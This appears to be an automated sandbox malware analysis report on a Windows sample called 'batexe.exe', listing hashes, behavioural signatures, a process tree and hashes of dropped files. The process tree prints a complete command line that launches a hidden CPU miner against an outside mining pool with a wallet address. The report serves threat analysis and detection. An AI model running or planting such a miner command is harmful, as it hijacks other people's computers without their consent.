Analysis
-
max time kernel
294s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
19/02/2024, 16:38
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1888 b2e.exe 1700 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1700 cpuminer-sse2.exe 1700 cpuminer-sse2.exe 1700 cpuminer-sse2.exe 1700 cpuminer-sse2.exe 1700 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/1432-7-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1432 wrote to memory of 1888 1432 batexe.exe 85 PID 1432 wrote to memory of 1888 1432 batexe.exe 85 PID 1432 wrote to memory of 1888 1432 batexe.exe 85 PID 1888 wrote to memory of 4332 1888 b2e.exe 87 PID 1888 wrote to memory of 4332 1888 b2e.exe 87 PID 1888 wrote to memory of 4332 1888 b2e.exe 87 PID 4332 wrote to memory of 1700 4332 cmd.exe 89 PID 4332 wrote to memory of 1700 4332 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\6F73.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6F73.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6F73.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71D4.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1700
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD57b9e19cbeef48d1436f80636d98f1e29
SHA1211ab3ec2dbf56621bfa6e7b4af51f6d59ed7e22
SHA256ab3065d4cd6d2916257227617fba70a92bdb7b65f474d9a3b5a7910c6791775d
SHA512cd561dbc1747d3f5e1a799a1d6f13d71150e273835ecfd1f84b00e742b04a23b41daf83db404ef527c1531f665bd6e74a4fc62bc84759208b958a4803063bdae
-
Filesize
402KB
MD5ac60544bfb0183935811464891c4f2ba
SHA1e08b21f1e2424a62bd0f06ea9fcd6dc339e65d70
SHA256e80e6279af950a91f8b34c7b1ffb0adeb62935ba08fbf97a1f29d27e04ceef5d
SHA512d9b1e5f600abcb941ac542b55169060e569097edd51db4b13252665b93a7261d6af580957b1287876333ef034dfe1bf7f4246d373a2c70470d47eb1bd14ccfa4
-
Filesize
479KB
MD579a449f00d3674922fbffa83a1e9fff0
SHA1d7b24a12b496d6ce9349dcc8c402e9dd44988784
SHA25660e89746a23cbe728d1e5793d5fb27209530686196bef77cbb9bf5e2bf29b886
SHA51200ed494b19181739630209d29816ea5094ddadcdf7361a197e0f0ce0f37476b8994183a10b1508968511f5800acd5e8fc3c160221207d6ba76fbb9c45e2dbab0
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.9MB
MD54d9fa13ddcee161e024f7128d9257ae6
SHA1bbf3e73a9c98eb80f4f42ebf19957a9379a0926b
SHA2562d7f1e9f4b8d3f55430bcb38efade9c590d93224cd25712bb92ca01a6fedef9d
SHA51248a51157bdc978e117333ea5252622ced0b3242500d2b5edea4772f422b1809396ceba19750cf3d1d55626a65547a7d99583fc7b4919f10d58c4e0da8c8c3078
-
Filesize
1.6MB
MD54a1d9c365771317bf6d898ee88645b40
SHA1d7f43a1de825a2e448dd7c6f9c811e557e8b2693
SHA2563f6e2dda231dba2f04f4a263c0d33e1740c1136fe1efa6b061a1b3270f183e8f
SHA512c5420a8c6ded8117bd7aa8af30d83dcd4345564b7cd29aaba1a17a14fe4e35bc0dd593746a8b179c75049a8b95655a806c437c4a2c6b37b4f80abb55fe8b32a5
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.1MB
MD57335f6b17c853105ea74cc0f5b35ae9a
SHA18a2394bd3da854ff5920a4eb797cf5a8d412afa5
SHA2564d4e8f7e42c890e24305fb74425d3cdaa3c58bec501ca5f0b1de1bd1b885af9e
SHA512f82a026d81f2210f3f4e63294f5800b4e9a65011e26319457ee1d3361d00640eb07e2ec1bf52ad8e654849fcac16f738edf90e8978ee0780c79895b6536f71f0
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.1MB
MD5c4bc68c1f6360f85a950cb7c7a419506
SHA150fccf157b029e188d50c30875581dd8240a36a6
SHA256b4ba292d16777b3be17dcd2623c6911fd0b91e91164b4fce2737792d28c00412
SHA5120883d3ac7c809ecd5ba495375e41cf6e07eaf263479ffe9eefc35217c036ea891eeef1a32ce0de6e45914649b06ab7ced4cbbefd35c394c7862b5a2a776ef778
-
Filesize
1.4MB
MD5b90d5a105b063831fed5d88567f5dc5f
SHA11a8361f61bb48c73d97fd549f8d775ca3ee427e6
SHA256d031ff4ddf1963598dc36f1b79990e6b99c3e68576542f568a8603233f4df404
SHA5122b302387028af9f3e2b915fd04016d3a658b3cd296f78155fea26c00fe42ccf2632498ea00d32b0a2f38112f32915cbe9e76dad7860b63d6b59192edd9feb9a5
-
Filesize
1.6MB
MD5e81f97ad2d406d91acbb9653ad6bc713
SHA1257f3944f6cbd0bc7072fe26372edb5bb46ba35f
SHA25611d2972bf5df2058949dfa40d482837d46c33aba6ded4655689166fee2c214cf
SHA512cead3328672d49a786b54d95b67ddaffd41e786e9736319d90bf7ec1e01a84f7ac2cc03b76605333ecc4dd0fbb30f5599663723a7fb1468c423f620b97ba5e6e
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770